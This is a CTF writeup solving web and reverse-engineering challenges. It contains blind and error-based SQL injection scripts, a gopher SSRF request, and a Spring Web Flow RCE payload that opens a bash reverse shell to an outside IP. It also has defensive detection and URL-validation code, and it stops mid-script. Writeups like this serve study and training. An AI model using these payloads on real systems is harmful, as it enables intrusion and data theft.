
Title: The first 'Hecheng Cup' CTF Cyber Security Challenge - Preliminary Writeup

WEB

1. middle_magic

Level 1: prefix the value with %0a to bypass the check, and append %23 (#) at the end.

Level 2: an array parameter bypasses the check.

Level 3: JSON weak-type comparison.

http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23

POST: admin[]=1&root_pwd[]=2&level_3={'result':0}

flag{f03d41bf6c8d55f12324fd57f7a00427}

2. easy_sql_2

A login function: POST a username and password. Trying admin/admin logs in successfully, but the prompt says the flag is not here. With the username -1'||'1'%23 the response was "password error!", so the guess is that the backend looks up the stored password for the submitted username (the response was no longer "username error!"), then md5-hashes the submitted password and compares it with the stored one; if they match, login succeeds. Trying SQL injection: select is banned, so use the table statement instead. The database name is easy to extract; it can also be confirmed to be ctf without using table or regexp. Then move on to the table names. Although tables is filtered, columns is not, so information_schema.columns can be used to blindly extract the table names (MySQL 8.0, table statement):

Since information_schema.tables is filtered, use mysql.innodb_table_stats instead:

admin'/**/and/**/(('ctf','%s',3,4,5,6)=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#

Note the flag table: fl11aag

Script (hex variant):

import string
import requests
import time

req = requests.session()
url = 'http://182.116.62.85:26571/login.php'

def hh():
    # Compare one hex digit of the row at a time; 'success' in the response means the guess was right
    payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"
    chars = string.printable.replace('.', '').replace('?', '').replace('`', '').replace('+', '') + '_\\{}'
    result = ''
    for i in range(1, 100):
        for j in range(48, 125):
            data = {'username': payload % (i, j), 'password': 'admin'}
            rep = req.post(url, data)
            text = rep.text
            if 'success' in text:
                print(j)
                result += chr(j)
                # print((chr(j)), end='')
                # payload = payload % (chr(j-1) + '%s')
                print(result)
                break

hh()

or:

# -*- coding: utf-8 -*-
import requests

def bind_sql():
    flag = ''
    # Candidate characters in descending order, so the first match is the largest prefix that sorts below the real value
    dic = '~}|{zyxwvutsrqponmlkjihgfedcba`_^]\\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?=;9876543210/-,+*)(%$#!'
    for i in range(1, 1000):
        f = flag
        for j in dic:
            _ = flag + j
            # Row-tuple comparison against the table statement's output (the '<' was lost in the post's formatting)
            # payload = "11'||('ctf',binary'{}',1,2,3,4)<(table/**/mysql.innodb_table_stats/**/limit/**/1,1)#".format(_)  # admin, fl11aag
            payload = "11'||(binary'{}')<(table/**/ctf.fl11aag/**/limit/**/1,1)#".format(_)
            print(payload)
            data = {
                'username': payload,
                'password': 'admin'
            }
            res = requests.post(url=url, data=data)
            if 'success' in res.text:
                if j == '~':
                    # '~' matched: the previous character was one too low, bump it and stop
                    flag = flag[:-1] + chr(ord(flag[-1]) + 1)
                    print(flag)
                    exit()
                flag += j
                print(flag)
                break
        if flag == f:
            break
    return flag

if __name__ == '__main__':
    url = 'http://182.116.62.85:26571/login.php'
    result = bind_sql()
    print(result)
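As an added, defender-side example (not code from the original writeup), the following Python scans logged login POST bodies for the traits of the payloads above: the MySQL 8.0 TABLE statement that gets around a select blacklist, reads of mysql.innodb_table_stats or information_schema, /**/ used in place of whitespace, and a trailing comment terminator. The rule names and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample login bodies as an application log might record them; the two
# injection bodies mirror the payload shapes used in this writeup, the others are benign.
SAMPLE_BODIES = [
    "username=admin&password=admin",
    "username=admin'/**/and/**/(('ctf','f',3,4,5,6)=/**/(table/**/mysql.innodb_table_stats"
    "/**/limit/**/2,1))%23&password=admin",
    "username=11'||(binary'fl')<(table/**/ctf.fl11aag/**/limit/**/1,1)%23&password=admin",
    "username=o'brien&password=pa%23%23word",
]

# Each rule names one trait of the blind-injection payloads; none is conclusive on its own.
RULES = {
    "mysql8_table_statement": re.compile(r"\btable\s+[\w.]+\s+limit\s+\d+", re.I),
    "schema_metadata_read": re.compile(r"information_schema\.|mysql\.innodb_table_stats", re.I),
    "trailing_comment_terminator": re.compile(r"(#|--\s)\s*$"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(value: str) -> str:
    # Inline comments stand in for spaces in these payloads; collapse them before matching.
    return INLINE_COMMENT.sub(" ", value).lower()

def scan_value(value: str) -> set:
    hits = {name for name, rx in RULES.items() if rx.search(normalize(value))}
    if INLINE_COMMENT.search(value):
        hits.add("inline_comment_obfuscation")
    return hits

def scan_body(body: str) -> dict:
    """Map each form field that triggered at least one rule to the set of rule names."""
    fields = parse_qs(body, keep_blank_values=True)
    report = {}
    for name, values in fields.items():
        hits = set().union(*(scan_value(v) for v in values))
        if hits:
            report[name] = hits
    return report

def is_suspicious(body: str) -> bool:
    # A lone '#' or apostrophe is normal user input; require the TABLE statement or two traits.
    return any("mysql8_table_statement" in h or len(h) >= 2 for h in scan_body(body).values())

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_suspicious(body), scan_body(body))
```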

3. easy_sql_1

Used gopher to hit index.php, tried admin/admin and got a cookie; decoding it gave admin. A single quote produced an error, so it is injectable. Inject: admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#

Exp:

gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A

The old login page says it is not internal, so it cannot be used directly. F12 reveals use.php, which contains an SSRF. Use the gopher protocol to POST a login as admin/admin and find the cookie this_is_your_cookie=YWRtaW4=. Sending the cookie along, the POST shows no echo after a few attempts, so try injecting through the cookie: base64-encode admin' and send it, which directly produces a SQL error. The database is the sqli-labs one, so use error-based injection to read out the flag:

import requests
from urllib.parse import quote

# Raw HTTP request smuggled through the gopher URL; the cookie carries the base64-encoded injection
data = '''POST / HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_your_cookie=LTEnKXx8dXBkYXRleG1sKDEsY29uY2F0KDEsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZykgZnJvbSBmbGFnKSwxKSwxKSM=;PHPSESSID=susn9dj4f1806v0pl5oiureek1;
Content-Length: {}

{}'''
payload = 'uname=admin&passwd=admin'
length = len(payload)
data = data.format(length, payload)
data = quote(data, 'utf-8')
url = 'http://182.116.62.85:28303/use.php'
params = {'url': 'gopher://127.0.0.1:80/_' + data}
headers = {'Cookie': 'PHPSESSID=8t4ppbs8ek3l5v5estgbttqtu3'}
r = requests.get(url, params=params, headers=headers)
print(r.text)
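As an added, defender-side example (not code from the original writeup), this Python shows the outbound-URL check that use.php lacks: only http/https is allowed, the decoded URL may not contain CR/LF (the gopher value above is a whole raw HTTP request), and literal loopback or non-public hosts are refused. The function name and the sample URL are assumptions.

```python
import ipaddress
from typing import Optional
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample in the shape of the gopher:// value sent to use.php's url parameter
# in this writeup: an encoded raw HTTP request (CRLF as %0D%0A) aimed at localhost.
GOPHER_SAMPLE = ("gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0A"
                 "Host%3A%20127.0.0.1%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A")

def ssrf_reject_reason(url: str) -> Optional[str]:
    """Return why an outbound fetch of `url` must be refused, or None if it may proceed.

    Only literal hosts are judged here; a deployment must also resolve DNS names and
    re-run the address check on the resolved IP and on every redirect target.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # gopher://, file://, dict:// ... are all refused
        return f"scheme not allowed: {scheme or '(none)'}"
    decoded = unquote(url)
    if "\r" in decoded or "\n" in decoded:     # a smuggled raw request needs line breaks
        return "CR/LF in url"
    host = parts.hostname
    if not host:
        return "missing host"
    if host.lower() == "localhost" or host.lower().endswith(".localhost"):
        return "loopback host name"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None                            # DNS name: resolve and re-check before connecting
    if not addr.is_global:                     # loopback, private, link-local, reserved ...
        return f"non-public address: {addr}"
    return None

if __name__ == "__main__":
    for u in (GOPHER_SAMPLE, "http://127.0.0.1/index.php", "https://example.com/status"):
        print(u[:40], "->", ssrf_reject_reason(u))
```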

4. spring

The challenge is CVE-2017-4971, the Spring Web Flow remote code execution vulnerability.

Original XMAN challenge:

https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/

Open the login page, fill in the given account and log in.

Then go to the http://ip/hotels/1 page and click Book Hotel

Then fill in the form with arbitrary information and click Proceed to reach the confirmation page.

Click Confirm, intercept the request, insert the payload and start the listener.

_eventId_confirm=&_csrf=bcc5ce94-5277-4064-b5f7-850432e3d2f0&_(new+java.lang.ProcessBuilder('bash','-c','bash+-i+%26+/dev/tcp/121.40.134.251/10086+0%261')).start()=vulhub

Then send the request and wait for the server to connect back.

Shell obtained; flag.txt is in the root directory and contains the flag.

flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

5. easypy

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

// Block direct access to utils.php and any URI mentioning show_source
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit('hacker :)');
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])) {
    exit('hacker :)');
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
} else {
    show_source(__FILE__);
}
?>

The original challenge has been modified; reference: https://www.gem-love.com/ctf/1898.html

Request directly: http://182.116.62.85:21895/index.php/utils.php/%81?show[source

Or /index.php/utils.php/%ff/?show[source

Reverse

1. DesignEachStep

Figure 1: the app mainly uses Arrays.equals to verify the input, so hook it directly with Frida:

function main() {
    Java.perform(function () {
        var ByteString = Java.use('com.android.okhttp.okio.ByteString');
        // Log both byte arrays each time Arrays.equals(byte[], byte[]) is called
        Java.use('java.util.Arrays').equals.overload('[B', '[B').implementation = function (x, y) {
            console.log('start.');
            var result = this.equals(x, y);
            console.log('arg:', ByteString.of(x).utf8(), ByteString.of(y).utf8());
            return result;
        };
    });
}
setImmediate(main);

Figure 2: this gives the flag: flag{DE5_c0mpr355_m@y_c0nfu53}

2. AreYouRich

Judging from the final balance check, the balance must be greater than 49999999. There is also an RC4 encryption here; decrypting it gives the account password (Figure 3, Figure 4). Log in and purchase the flag: flag{y0u_h@V3_@_107_0f_m0n3y!}

3. petition

It is always XOR, with a single ~ (NOT) in the middle; the inverse of 0 is 0xff.

s = [0x1e, 0, 7, 0xce, 0xf9, 0x8c, 0x88, 0xa8, 0x52, 0x99, 0x19, 0x15, 0x66, 0x2e, 0xaf, 0xf6,
     0x43, 0x2c, 0xc9, 0xca, 0x66, 0xaa, 0x4c, 0, 0x25, 0xd6, 0xff, 0x44, 0xbd, 0x72, 0x65, 8,
     0x85, 0x12, 0x7f, 0x13, 0x24, 0xfc, 0x24, 0x33, 0x23, 0x97, 0xb2]
s1 = [0x78, 108, 0x66, 0xa9, 0x82, 0xb5, 0xbe, 0xcb, 0x64, 0xa0, 0x2f, 0x21, 0x50, 3, 0x97, 0xc7,
      0x7b, 0x18, 0xe4, 0xfe, 0x55, 0x9c, 0x7f, 0x2d, 0x1d, 0xb2, 0x9a, 0x7d, 0x90, 0x45, 0x56, 0x6e,
      0xb2, 0x21, 0x46, 0x2b, 0x14, 0xca, 0x12, 0x50, 0x12, 0xea, 0xb2]
print(len(s))
flag = ''
for i in range(len(s)):
    # Each flag byte is recovered by XORing the expected value with the per-position key
    flag += chr(s[i] ^ s1[i])
print(flag)

Or, more generally: I like this kind of challenge because the flag is checked character by character, so being able to brute-force it is of course a very pleasant thing. Back to the main text: load the file in IDA. The program starts by printing "%36s", but in fact you have to enter a full 42 characters, a liar. Going down from start, if you look at the bunch of functions you will find that each of them looks similar, so guess that the flag is verified character by character, with one function per flag character. Debugging and the like is still quite tiring (I won't tell you that I can't understand how the flag is checked at all). To be lazy, I directly use Unicorn here, patch the places in the start function where printf and scanf are called, and hook scanf so that the flag can be written into memory.

This lets the program's input and verification functions run. Below is the Unidbg class I wrote for this program:

from unicorn import *
from unicorn.x86_const import *
from capstone import *
import binascii

Petition_base = 0x0  # the address the program is loaded at
Petition_stack_base = 0x10000

with open('Petition', 'rb') as f:
    code = f.read()

xxx = [b'\x00', b'\x01', b'\x02', b'\x03', b'\x04', b'\x05', b'\x06', b'\x07',
       b'\x08', b'\x09', b'\x0a', b'\x0b', b'\x0c', b'\x0d', b'\x0e', b'\x0f',
       b'\x10', b'\x11', b'\x12', b'\x13', b'\x14', b'\x15', b'\x16', b'\x17',
       b'\x18', b'\x19', b'\x1a', b'\x1b', b'\x1c', b'\x1d', b'\x1e', b'\x1f',
       b'\x20', b'\x21', b'\x22', b'\x23', b'\x24', b'\x25', b'\x26', b'\x27',
       b'\x28', b'\x29', b'\x2a', b'\x2b', b'\x2c', b'\x2d', b'\x2e', b'\x2f',
       b'\x30', b'\x31', b'\x32', b'\x33', b'\x34', b'\x35', b'\x36', b'\x37',
       b'\x38', b'\x39', b'\x3a', b'\x3b', b'\x3c', b'\x3d', b'\x3e', b'\x3f',
       b'\x40', b'\x41', b'\x42', b'\x43', b'\x44', b'\x45', b'\x46', b'\x47',
       b'\x48', b'\x49', b'\x4a', b'\x4b', b'\x4c', b'\x4d', b'\x4e', b'\x4f',
       b'\x50', b'\x51', b'\x52', b'\x53', b'\x54', b'\x55', b'\x56', b'\x57',
       b'\x58', b'\x59', b'\x5a', b'\x5b', b'\x5c', b'\x5d', b'\x5e', b'\x5e',
       b'\x5f', b'\x60', b'\x61', b'\x62', b'\x63', b'\x64',
